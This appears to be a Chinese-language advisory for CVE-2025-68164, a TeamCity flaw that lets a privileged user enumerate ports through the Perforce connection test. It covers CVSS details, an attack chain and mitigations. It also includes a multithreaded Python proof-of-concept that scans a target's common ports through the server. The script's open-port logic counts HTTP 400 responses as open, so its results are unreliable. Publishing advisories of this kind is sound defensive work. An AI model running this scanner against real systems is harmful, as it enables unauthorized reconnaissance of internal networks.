CVE-2025-68164: JetBrains TeamCity Perforce连接测试端口枚举漏洞

漏洞信息

漏洞编号

CVE-2025-68164

漏洞类型

信息泄露

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

JetBrains TeamCity

漏洞概述

CVE-2025-68164是JetBrains TeamCity软件中的一个信息泄露漏洞。该漏洞存在于2025.11版本之前的TeamCity中，允许通过Perforce连接测试功能进行端口枚举攻击。攻击者可以利用此漏洞探测目标系统上运行的服务和开放端口，从而获取敏感的网络拓扑信息。漏洞的CVSS评分为2.7，属于低危级别，主要影响机密性，对完整性和可用性没有影响。攻击向量为网络攻击，但需要高权限用户认证才能利用。此漏洞由JetBrains安全团队（[email protected]）发现并报告。端口枚举是信息收集阶段的重要步骤，攻击者常利用此类信息为后续更复杂的攻击做准备。尽管该漏洞本身危害程度较低，但在企业内网环境中，详细的端口信息可能被用于针对性攻击。JetBrains已于2025.11版本中修复此问题，建议所有使用TeamCity的企业尽快升级到最新版本以消除该安全风险。

技术细节

JetBrains TeamCity在处理Perforce连接测试时存在安全漏洞。攻击者通过构造特殊的Perforce连接测试请求，可以触发服务器对指定端口进行探测，从而获取目标系统的端口开放状态信息。该漏洞的技术原理如下：

1. 漏洞位置：TeamCity的Perforce连接测试功能模块
2. 漏洞成因：应用程序未对用户输入的端口参数进行充分验证和访问控制
3. 利用方式：攻击者通过API或Web界面发起Perforce连接测试请求，指定目标IP地址和端口范围
4. 服务器行为：TeamCity服务器会尝试连接到指定地址的指定端口，并返回连接结果（开放/关闭）
5. 信息泄露：通过反复测试不同端口，攻击者可以绘制出目标系统的端口开放图谱

CVSS向量分析：
- AV:N（网络攻击）：可从网络远程利用
- AC:L（低复杂度）：攻击难度较低
- PR:H（高权限）：需要认证用户权限
- UI:N（无用户交互）：无需用户参与
- C:L（低机密性影响）：可获取端口信息
- I:N/A:N（无完整性/可用性影响）：不影响系统完整性和可用性

修复方案：在2025.11版本中，JetBrains对Perforce连接测试功能进行了安全加固，增加了权限验证和请求频率限制。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者首先识别目标环境中运行的JetBrains TeamCity版本，确认版本号低于2025.11

STEP 2

步骤2

获取访问权限：攻击者需要获取具有Perforce连接测试权限的高权限用户账户凭证

STEP 3

步骤3

构造探测请求：攻击者构造特殊的Perforce连接测试请求，指定目标IP地址和待检测端口

STEP 4

步骤4

端口扫描：利用TeamCity服务器作为代理，对目标IP的端口范围进行遍历探测

STEP 5

步骤5

信息收集：分析响应结果，确定哪些端口处于开放状态，绘制目标网络端口图谱

STEP 6

步骤6

后续攻击：根据枚举到的端口信息，结合已知漏洞进行进一步针对性攻击，如SSH、数据库等服务的漏洞利用

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68164 PoC - JetBrains TeamCity Port Enumeration via Perforce Connection Test
# This PoC demonstrates the port enumeration vulnerability in TeamCity < 2025.11

import requests
import json
import sys
from concurrent.futures import ThreadPoolExecutor, as_completed

def check_port_via_perforce_test(base_url, target_ip, port, session_cookie, csrf_token):
    """
    Test if a specific port is open by leveraging the Perforce connection test functionality
    """
    endpoint = f"{base_url}/app/rest/vcs-root-instances/checkConnection"
    
    headers = {
        'Content-Type': 'application/json',
        'Cookie': session_cookie,
        'X-CSRF-Token': csrf_token
    }
    
    payload = {
        'vcsRoot': {
            'id': 'PerforceTest',
            'name': 'Perforce Test',
            'vcsName': 'perforce',
            'properties': {
                'port': target_ip,
                'client': 'test_client',
                'user': 'test_user',
                'password': 'test_password',
                'workspaceDir': '.',
                'portNumber': str(port)  # Target port to enumerate
            }
        }
    }
    
    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10, verify=False)
        
        # Port is likely open if connection succeeds (no timeout, no connection refused)
        if response.status_code in [200, 400] and 'connection refused' not in response.text.lower():
            return port, True, response.status_code
        else:
            return port, False, response.status_code
            
    except requests.exceptions.Timeout:
        return port, False, 'timeout'
    except requests.exceptions.ConnectionError:
        return port, False, 'connection_error'
    except Exception as e:
        return port, None, str(e)

def enumerate_ports(base_url, target_ip, ports, session_cookie, csrf_token):
    """
    Enumerate multiple ports using the Perforce connection test vulnerability
    """
    results = {'open': [], 'closed': [], 'error': []}
    
    print(f"[*] Starting port enumeration on {target_ip} via TeamCity Perforce test")
    print(f"[*] Testing {len(ports)} ports...")
    
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {
            executor.submit(check_port_via_perforce_test, base_url, target_ip, port, session_cookie, csrf_token): port
            for port in ports
        }
        
        for future in as_completed(futures):
            port, is_open, status = future.result()
            if is_open:
                print(f"[+] Port {port} appears to be OPEN")
                results['open'].append(port)
            elif is_open is False:
                results['closed'].append(port)
            else:
                results['error'].append({'port': port, 'status': status})
    
    return results

def main():
    if len(sys.argv) < 5:
        print("Usage: python cve-2025-68164_poc.py <teamcity_url> <target_ip> <session_cookie> <csrf_token>")
        print("Example: python cve-2025-68164_poc.py https://teamcity.local 192.168.1.100 'tc_session=xxx' 'csrf_token_xxx'")
        sys.exit(1)
    
    base_url = sys.argv[1].rstrip('/')
    target_ip = sys.argv[2]
    session_cookie = sys.argv[3]
    csrf_token = sys.argv[4]
    
    # Common ports to enumerate
    common_ports = [
        21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
        993, 995, 1723, 3306, 3389, 5900, 8080, 8443, 9090
    ]
    
    results = enumerate_ports(base_url, target_ip, common_ports, session_cookie, csrf_token)
    
    print("\n" + "="*50)
    print("[*] Enumeration Complete")
    print(f"[+] Open Ports: {results['open']}")
    print(f"[*] Closed Ports: {len(results['closed'])}")
    print(f"[!] Errors: {len(results['error'])}")
    print("="*50)

if __name__ == "__main__":
    main()

影响范围

JetBrains TeamCity < 2025.11

防御指南

临时缓解措施

如果无法立即升级到2025.11版本，可采取以下临时缓解措施：1）限制TeamCity的访问网络范围，仅允许受信任的IP地址访问管理界面；2）禁用或限制非管理员用户使用Perforce连接测试功能；3）在Web应用防火墙（WAF）层面添加规则，检测和阻止异常的端口探测请求模式；4）启用详细的访问日志审计，对连接测试请求进行实时监控和告警；5）考虑使用网络分段技术，将TeamCity部署在隔离的网络区域中，减少信息泄露的风险；6）联系JetBrains支持团队获取针对此漏洞的特定热修复补丁。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-68164
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-68164
3 Details https://www.cvedetails.com/cve/CVE-2025-68164/
4 VulDB https://vuldb.com/cve/CVE-2025-68164
5 Link https://www.jetbrains.com/privacy-security/issues-fixed/